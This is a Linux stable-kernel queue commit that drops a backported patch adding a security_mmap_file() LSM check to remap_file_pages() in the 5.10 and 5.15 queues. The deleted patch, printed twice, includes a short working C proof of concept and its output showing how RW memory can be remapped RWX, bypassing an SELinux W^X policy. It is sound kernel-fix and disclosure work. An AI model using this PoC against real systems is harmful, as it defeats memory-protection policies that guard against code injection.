From: Greg Kroah-Hartman
Date: Wed, 19 Feb 2025 08:12:25 +0000 (+0100)
Subject: drop mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
X-Git-Tag: v6.1.129~6
X-Git-Url: http://git.ipfire.org/?a=commitdiff_plain;h=d42ce448c7eb7ae883c50de44de02006ed24df78;p=thirdparty%2Fkernel%2Fstable-queue.git

drop mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
---

diff --git a/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch b/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
deleted file mode 100644
index f9e785baeb..0000000000
--- a/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 Mon Sep 17 00:00:00 2001
-From: Shu Han
-Date: Tue, 17 Sep 2024 17:41:04 +0800
-Subject: mm: call the security_mmap_file() LSM hook in remap_file_pages()
-
-From: Shu Han
-
-commit ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 upstream.
-
-The remap_file_pages syscall handler calls do_mmap() directly, which
-doesn't contain the LSM security check. And if the process has called
-personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for
-RW pages, this will actually result in remapping the pages to RWX,
-bypassing a W^X policy enforced by SELinux.
-
-So we should check prot by security_mmap_file LSM hook in the
-remap_file_pages syscall handler before do_mmap() is called. Otherwise, it
-potentially permits an attacker to bypass a W^X policy enforced by
-SELinux.
-
-The bypass is similar to CVE-2016-10044, which bypass the same thing via
-AIO and can be found in [1].
-
-The PoC:
-
-$ cat > test.c
-
-int main(void) {
- size_t pagesz = sysconf(_SC_PAGE_SIZE);
- int mfd = syscall(SYS_memfd_create, "test", 0);
- const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
- MAP_SHARED, mfd, 0);
- unsigned int old = syscall(SYS_personality, 0xffffffff);
- syscall(SYS_personality, READ_IMPLIES_EXEC | old);
- syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
- syscall(SYS_personality, old);
- // show the RWX page exists even if W^X policy is enforced
- int fd = open("/proc/self/maps", O_RDONLY);
- unsigned char buf2[1024];
- while (1) {
- int ret = read(fd, buf2, 1024);
- if (ret <= 0) break;
- write(1, buf2, ret);
- }
- close(fd);
-}
-
-$ gcc test.c -o test
-$ ./test | grep rwx
-7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
-
-Link: https://project-zero.issues.chromium.org/issues/42452389 [1]
-Cc: stable@vger.kernel.org
-Signed-off-by: Shu Han
-Acked-by: Stephen Smalley
-[PM: subject line tweaks]
-Signed-off-by: Paul Moore
-Signed-off-by: Pratyush Yadav
-Signed-off-by: Greg Kroah-Hartman
----
- mm/mmap.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -3078,8 +3078,12 @@ SYSCALL_DEFINE5(remap_file_pages, unsign
- }
- 
- file = get_file(vma->vm_file);
-+ ret = security_mmap_file(vma->vm_file, prot, flags);
-+ if (ret)
-+ goto out_fput;
- ret = do_mmap(vma->vm_file, start, size,
- prot, flags, pgoff, &populate, NULL);
-+out_fput:
- fput(file);
- out:
- mmap_write_unlock(mm);
diff --git a/queue-5.10/series b/queue-5.10/series
index b6382c2bdd..39d1e3b59a 100644
--- a/queue-5.10/series
+++ b/queue-5.10/series
@@ -319,7 +319,6 @@ x86-i8253-disable-pit-timer-0-when-not-in-use.patch
 revert-btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 pps-fix-a-use-after-free.patch
-mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
 ima-fix-use-after-free-on-a-dentry-s-dname.name.patch
 vlan-introduce-vlan_dev_free_egress_priority.patch
 vlan-move-dev_put-into-vlan_dev_uninit.patch
diff --git a/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch b/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
deleted file mode 100644
index 6753f80821..0000000000
--- a/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 Mon Sep 17 00:00:00 2001
-From: Shu Han
-Date: Tue, 17 Sep 2024 17:41:04 +0800
-Subject: mm: call the security_mmap_file() LSM hook in remap_file_pages()
-
-From: Shu Han
-
-commit ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 upstream.
-
-The remap_file_pages syscall handler calls do_mmap() directly, which
-doesn't contain the LSM security check. And if the process has called
-personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for
-RW pages, this will actually result in remapping the pages to RWX,
-bypassing a W^X policy enforced by SELinux.
-
-So we should check prot by security_mmap_file LSM hook in the
-remap_file_pages syscall handler before do_mmap() is called. Otherwise, it
-potentially permits an attacker to bypass a W^X policy enforced by
-SELinux.
-
-The bypass is similar to CVE-2016-10044, which bypass the same thing via
-AIO and can be found in [1].
-
-The PoC:
-
-$ cat > test.c
-
-int main(void) {
- size_t pagesz = sysconf(_SC_PAGE_SIZE);
- int mfd = syscall(SYS_memfd_create, "test", 0);
- const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
- MAP_SHARED, mfd, 0);
- unsigned int old = syscall(SYS_personality, 0xffffffff);
- syscall(SYS_personality, READ_IMPLIES_EXEC | old);
- syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
- syscall(SYS_personality, old);
- // show the RWX page exists even if W^X policy is enforced
- int fd = open("/proc/self/maps", O_RDONLY);
- unsigned char buf2[1024];
- while (1) {
- int ret = read(fd, buf2, 1024);
- if (ret <= 0) break;
- write(1, buf2, ret);
- }
- close(fd);
-}
-
-$ gcc test.c -o test
-$ ./test | grep rwx
-7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
-
-Link: https://project-zero.issues.chromium.org/issues/42452389 [1]
-Cc: stable@vger.kernel.org
-Signed-off-by: Shu Han
-Acked-by: Stephen Smalley
-[PM: subject line tweaks]
-Signed-off-by: Paul Moore
-Signed-off-by: Pratyush Yadav
-Signed-off-by: Greg Kroah-Hartman
----
- mm/mmap.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -3035,8 +3035,12 @@ SYSCALL_DEFINE5(remap_file_pages, unsign
- flags |= MAP_LOCKED;
- 
- file = get_file(vma->vm_file);
-+ ret = security_mmap_file(vma->vm_file, prot, flags);
-+ if (ret)
-+ goto out_fput;
- ret = do_mmap(vma->vm_file, start, size,
- prot, flags, pgoff, &populate, NULL);
-+out_fput:
- fput(file);
- out:
- mmap_write_unlock(mm);
diff --git a/queue-5.15/series b/queue-5.15/series
index 892e7fe574..c2f169228d 100644
--- a/queue-5.15/series
+++ b/queue-5.15/series
@@ -431,4 +431,3 @@ x86-i8253-disable-pit-timer-0-when-not-in-use.patch
 revert-btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 pps-fix-a-use-after-free.patch
-mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch